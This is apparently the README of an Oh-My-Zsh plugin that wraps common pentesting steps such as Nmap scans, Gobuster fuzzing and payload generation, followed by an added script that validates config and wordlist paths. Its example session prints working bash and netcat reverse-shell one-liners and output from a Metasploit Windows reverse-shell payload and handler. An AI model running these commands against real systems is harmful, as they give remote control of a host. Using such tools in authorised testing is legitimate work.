Plugin for Oh-My-Zsh with shell functions and automation for pentesting. It includes a variety of useful functions for network scanning, enumeration, reverse shell generation, and more, boosting efficiency and saving time on the common initial tasks of a pentest.

Clone this repository into `$ZSH_CUSTOM/plugins` (by default `~/.oh-my-zsh/custom/plugins`):

```sh
git clone https://github.com/syztem4our666/zsh-pentester.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-pentester
```

Add the plugin to the list of plugins for Oh My Zsh (inside `~/.zshrc`):

```sh
plugins=(
    # other plugins...
    zsh-pentester
)
```

Final step: restart the terminal or run:

```sh
source ~/.zshrc
```
| Function | Description |
|---|---|
| seturl | Sets the URL for fuzzing |
| settarget | Sets the target IP address for scanning |
| url | Displays the current URL target set with seturl |
| target | Displays the current target IP address set for scanning |
| create | Creates the folders recon, data and exploits in the current directory |
| scan | Scans the target IP given with settarget using Nmap |
| fuzz | Fuzzes the URL given with seturl using Gobuster |
| fuzzv | Fuzzes vhosts on the URL given with seturl using Gobuster |
| myip | Displays your IP address on the specified network interface (eth0, wlan0, tun0) |
| shellw | Generates a windows/x64/shell_reverse_tcp payload with your IP on the specified network interface; default port is 4444 |
| rshell | Gives you bash and netcat reverse shells with your IP on the specified network interface and default port 4444 |
| handler | Sets up a Metasploit handler for Windows with your IP on the specified network interface and default port 4444 |
| server | Starts a Python web server in the specified directory for file transfer |
| phelp | Displays information about the available functions |
```text
create
ls
data exploits recon

seturl http://www.example.com
[+] URL TARGET: http://www.example.com [+]

url
[+] URL TARGET: http://www.example.com [+]

settarget 192.168.1.44
[+] RHOST: 192.168.1.44 [+]

target
[+] IP TARGET: 192.168.1.44 [+]

myip
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
192.168.100.55

rshell
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
bash -c 'exec bash -i &>/dev/tcp/192.168.100.55/4444 <&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.55 4444 >/tmp/f

server
[+] Serving files from /home/attacker/Desktop/target [+]
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

shellw
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell64.exe
[+] Staged Payload for Windows has been created [+] IP: 192.168.100.55 Start listener on port:4444 [+]

handler
[+] Enter the interface name (e.g., wlan0, eth0, tun0)[+]: wlan0
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.100.55
LPORT => 4444
[*] Started reverse TCP handler on 192.168.100.55:4444
```
Tested on Kali, so by default the `fuzz` and `fuzzv` functions use Gobuster with SecLists wordlists. After `sudo apt install seclists` the default path is `/usr/share/wordlists/seclists/`. If that is not your default path, Gobuster will not find the wordlist when you run `fuzz` or `fuzzv`. Solve this by changing the wordlist path in the plugin:

```sh
nano ~/.oh-my-zsh/custom/plugins/zsh-pentester/zsh-pentester.plugin.zsh
```
```zsh
fuzz() {
    # memory.config is written by seturl/settarget and holds the saved targets
    if [ -f "$HOME/.oh-my-zsh/custom/plugins/zsh-pentester/memory.config" ]; then
        source "$HOME/.oh-my-zsh/custom/plugins/zsh-pentester/memory.config"
        if [[ -n "$URL" ]]; then
            echo "[+] Fuzzing with Gobuster URL: $URL [+]"
            # HERE: change the wordlist path on the line below if SecLists lives elsewhere
            gobuster dir -u "$URL" -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt"
        else
            echo "[x] URL is not set [x]"
        fi
    else
        echo "[x] Configuration file not found. [x]"
    fi
}
```

Search for the `fuzz` and `fuzzv` functions and change the path of the wordlist on the marked `gobuster` line.
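The fuzz function above sources memory.config and hardcodes one wordlist path, which is exactly where the two common failures come from: a config line that is not plain `KEY=value` gets executed by `source`, and a missing wordlist only surfaces as a Gobuster error. The following is an added example (not code from the zsh-pentester plugin) showing how those inputs can be checked before Gobuster is launched; the function names `read_config_value`, `validate_url`, `resolve_wordlist` and `build_fuzz_cmd` and the `ZSH_PENTESTER_WORDLIST` override variable are assumptions made for this example, and the config file and wordlist it uses are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example, not part of zsh-pentester. Validates the saved URL and the
# wordlist path before assembling the gobuster command the fuzz function runs.

# Read KEY=value from memory.config without sourcing it, so a config file
# that someone else could write to never executes commands in your shell.
read_config_value() {
    file="$1"; key="$2"
    [ -r "$file" ] || return 1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            "$key="*) printf '%s\n' "${line#"$key="}"; return 0 ;;
        esac
    done < "$file"
    return 1
}

# Accept only http(s) URLs built from a conservative character set, so a
# malformed or shell-metacharacter-laden value is rejected instead of passed on.
validate_url() {
    printf '%s\n' "$1" | grep -Eq '^https?://[A-Za-z0-9.-]+(:[0-9]+)?(/[A-Za-z0-9._~/%?&=-]*)?$'
}

# Pick the first readable wordlist: an explicit override (assumed variable
# ZSH_PENTESTER_WORDLIST), then the two SecLists layouts seen on Kali.
resolve_wordlist() {
    rel="Discovery/Web-Content/directory-list-2.3-medium.txt"
    for c in "${ZSH_PENTESTER_WORDLIST:-}" \
             "/usr/share/seclists/$rel" \
             "/usr/share/wordlists/seclists/$rel"; do
        if [ -n "$c" ] && [ -r "$c" ]; then
            printf '%s\n' "$c"
            return 0
        fi
    done
    echo "[x] No readable wordlist found; set ZSH_PENTESTER_WORDLIST [x]" >&2
    return 1
}

# Assemble (but do not run) the gobuster command line the fuzz function would
# execute. Every check above must pass, otherwise the caller gets a message
# on stderr and a non-zero status and nothing is launched.
build_fuzz_cmd() {
    config="$1"
    url=$(read_config_value "$config" URL) || { echo "[x] URL is not set [x]" >&2; return 1; }
    validate_url "$url" || { echo "[x] Refusing to fuzz malformed URL: $url [x]" >&2; return 1; }
    wordlist=$(resolve_wordlist) || return 1
    printf 'gobuster dir -u %s -w %s\n' "$url" "$wordlist"
}

# Demo on a constructed config and a stand-in wordlist (not a real target).
demo() {
    tmp=$(mktemp -d)
    printf 'URL=http://www.example.com\nRHOST=192.168.1.44\n' > "$tmp/memory.config"
    printf 'admin\nlogin\n' > "$tmp/words.txt"
    ( ZSH_PENTESTER_WORDLIST="$tmp/words.txt" build_fuzz_cmd "$tmp/memory.config" )
    rm -rf "$tmp"
}
demo
```

Dropping this into the plugin would mean replacing the `source` call with `read_config_value` and the hardcoded `-w` path with `resolve_wordlist`, so a different SecLists location only needs the override variable rather than an edit to the plugin file.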
Here are some ideas for future improvements or features that could be added to the plugin:

- Addition of new Nmap scripts for performing specific scans (enum SMTP, SMB, etc.)
- Integration with other pentesting tools, maybe https://github.com/Tib3rius/AutoRecon
- Initial recon for Windows & AD
- More commands for common pentesting tasks

If you have any suggestions or ideas for future implementations, feel free to share them! Contact me via Twitter: Syztem4our666

Contributions are very welcome to improve the functionality and usability of the Zsh pentester plugin.